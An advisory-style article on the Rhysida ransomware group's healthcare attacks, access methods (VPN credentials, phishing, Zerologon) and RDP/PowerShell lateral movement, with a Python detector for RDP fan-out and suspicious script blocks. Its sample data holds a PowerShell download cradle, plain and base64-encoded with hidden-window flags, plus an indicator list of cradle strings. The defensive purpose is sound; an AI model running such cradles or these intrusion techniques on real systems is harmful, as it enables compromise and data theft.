Rhysida Ransomware: A Growing Threat to Healthcare

Rhysida, a ransomware variant first observed in May 2023, has increasingly targeted the healthcare, education, manufacturing, information technology, and government sectors. The group is believed to operate on a ransomware-as-a-service (RaaS) model, in which affiliates lease the ransomware tooling and infrastructure and hand over a share of each ransom to the core operators.

Rhysida has repeatedly attacked the healthcare sector, exposing sensitive data belonging to hundreds of thousands of individuals. These attacks are double-extortion operations: personal and health information is stolen before systems are encrypted, and victims who do not pay see that data auctioned or published on Rhysida's dark web leak site.

For initial access, the group exploits external remote services, such as VPN appliances, most often by logging in with compromised credentials rather than through an exploit, and it also runs phishing campaigns. It has additionally exploited Zerologon (CVE-2020-1472), a critical flaw in the Netlogon Remote Protocol that lets an attacker with network access to a domain controller reset its machine account password and take over the domain; Microsoft patched it in August 2020, so its continued use indicates unpatched domain controllers. Once inside, the actors rely on living-off-the-land techniques, moving laterally over Remote Desktop Protocol (RDP) sessions and running PowerShell scripts, so that their activity looks like routine administration. Because these tools are in legitimate daily use, detection depends on context rather than on the tool itself: one account opening RDP sessions to many hosts in a short window, or PowerShell launched with encoded or hidden-window arguments and download cradles, is the signal, not RDP or PowerShell alone.
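The following is an added example, not code from the original page, from CISA or from Trend Micro. It shows the two contextual checks described above run over a constructed set of simplified Windows events: a fan-out rule that flags an account opening RDP sessions (Security log 4624, logon type 10) to several distinct hosts within a short window, and a script block check (PowerShell Operational log 4104) that decodes `-EncodedCommand` payloads and scans for common cradle and evasion strings. All hostnames, usernames, IP addresses, thresholds and the encoded payload are hypothetical; the field names only loosely mirror the real event schemas, and in practice the events would be pulled from a SIEM or `Get-WinEvent`.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# All events below are constructed for this example. Field names loosely follow
# Windows Security log 4624 (successful logon; LogonType 10 = RemoteInteractive,
# i.e. RDP) and PowerShell Operational log 4104 (script block logging).
def ev(ts, event_id, **fields):
    return {"ts": ts, "event_id": event_id, **fields}

# Hypothetical payload: a PowerShell download cradle, base64-encoded as UTF-16LE
# the way powershell.exe -EncodedCommand expects it (built here, not hand-typed).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.20.5.17/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    # svc_backup fans out over RDP to four hosts in nine minutes (lateral movement pattern)
    ev("2024-03-01T02:10:05", 4624, logon_type=10, user="svc_backup", src_ip="10.20.5.17", host="FS01"),
    ev("2024-03-01T02:12:40", 4624, logon_type=10, user="svc_backup", src_ip="10.20.5.17", host="APP02"),
    ev("2024-03-01T02:15:02", 4624, logon_type=10, user="svc_backup", src_ip="10.20.5.17", host="HR01"),
    ev("2024-03-01T02:19:30", 4624, logon_type=10, user="svc_backup", src_ip="10.20.5.17", host="DC01"),
    # jdoe: an ordinary admin, two RDP sessions an hour apart (should not fire)
    ev("2024-03-01T09:00:00", 4624, logon_type=10, user="jdoe", src_ip="10.20.8.4", host="FS01"),
    ev("2024-03-01T10:05:00", 4624, logon_type=10, user="jdoe", src_ip="10.20.8.4", host="APP02"),
    # a vulnerability scanner: many hosts, but network logons (type 3), not RDP
    ev("2024-03-01T03:00:00", 4624, logon_type=3, user="scanner", src_ip="10.20.1.9", host="FS01"),
    ev("2024-03-01T03:00:01", 4624, logon_type=3, user="scanner", src_ip="10.20.1.9", host="APP02"),
    ev("2024-03-01T03:00:02", 4624, logon_type=3, user="scanner", src_ip="10.20.1.9", host="HR01"),
    # PowerShell script blocks (4104): two suspicious, one routine
    ev("2024-03-01T02:13:10", 4104, host="APP02", user="svc_backup",
       script=f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED}"),
    ev("2024-03-01T02:16:00", 4104, host="HR01", user="svc_backup", script=CRADLE),
    ev("2024-03-01T09:01:00", 4104, host="FS01", user="jdoe",
       script="Get-Service -Name Spooler | Restart-Service"),
]


def parse_ts(s):
    return datetime.fromisoformat(s)


def rdp_fanout(events, threshold=3, window=timedelta(minutes=15)):
    """Flag (user, src_ip) pairs that opened RDP sessions (4624, logon type 10)
    to at least `threshold` distinct hosts within `window`.
    Returns {(user, src_ip): sorted list of target hosts}."""
    sessions = defaultdict(list)
    for e in events:
        if e["event_id"] == 4624 and e.get("logon_type") == 10:
            sessions[(e["user"], e["src_ip"])].append((parse_ts(e["ts"]), e["host"]))
    findings = {}
    for key, logons in sessions.items():
        logons.sort()
        # slide a window forward from each logon; fire on the first window that fills
        for i, (start, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) >= threshold:
                findings[key] = sorted(hosts)
                break
    return findings


# Strings that commonly appear in download cradles and evasion flags.
INDICATORS = ("downloadstring", "invoke-expression", "iex ", "frombase64string",
              "-w hidden", "-windowstyle hidden")
# -e, -enc and -EncodedCommand all accept a base64 argument.
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def suspicious_powershell(events):
    """Scan 4104 script blocks for the indicators above. Encoded commands are
    decoded (UTF-16LE) and the decoded text is scanned as well.
    Returns a list of {host, user, indicators}."""
    findings = []
    for e in events:
        if e["event_id"] != 4104:
            continue
        text = e["script"]
        hits = set()
        m = ENCODED_RE.search(text)
        if m:
            hits.add("encodedcommand")
            try:
                text += " " + base64.b64decode(m.group(1)).decode("utf-16le", "replace")
            except ValueError:
                hits.add("undecodable-encodedcommand")
        lowered = text.lower()
        hits.update(ind.strip() for ind in INDICATORS if ind in lowered)
        if hits:
            findings.append({"host": e["host"], "user": e["user"], "indicators": sorted(hits)})
    return findings


if __name__ == "__main__":
    for (user, src), hosts in rdp_fanout(SAMPLE_EVENTS).items():
        print(f"RDP fan-out: {user}@{src} -> {', '.join(hosts)}")
    for f in suspicious_powershell(SAMPLE_EVENTS):
        print(f"PowerShell: {f['user']}@{f['host']} {f['indicators']}")
```

The threshold and window are deliberately parameters: the right values depend on how many hosts a given admin account normally touches, and both rules are meant to be tuned against a baseline of legitimate RDP and PowerShell use rather than deployed as-is. Script block logging (4104) must be enabled by policy before the second check has anything to read.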

To reduce the risk of attacks like those from Rhysida, healthcare organizations are encouraged to implement the Healthcare and Public Health (HPH) Cybersecurity Performance Goals (CPGs), which cover the controls most relevant to this group's tradecraft: phishing-resistant multifactor authentication on remote access, prompt patching of known exploited vulnerabilities such as Zerologon, and logging that makes lateral movement visible. For more information about Rhysida and its indicators of compromise, refer to the Trend Micro report and the joint CISA, FBI and MS-ISAC #StopRansomware: Rhysida Ransomware advisory (AA23-319A).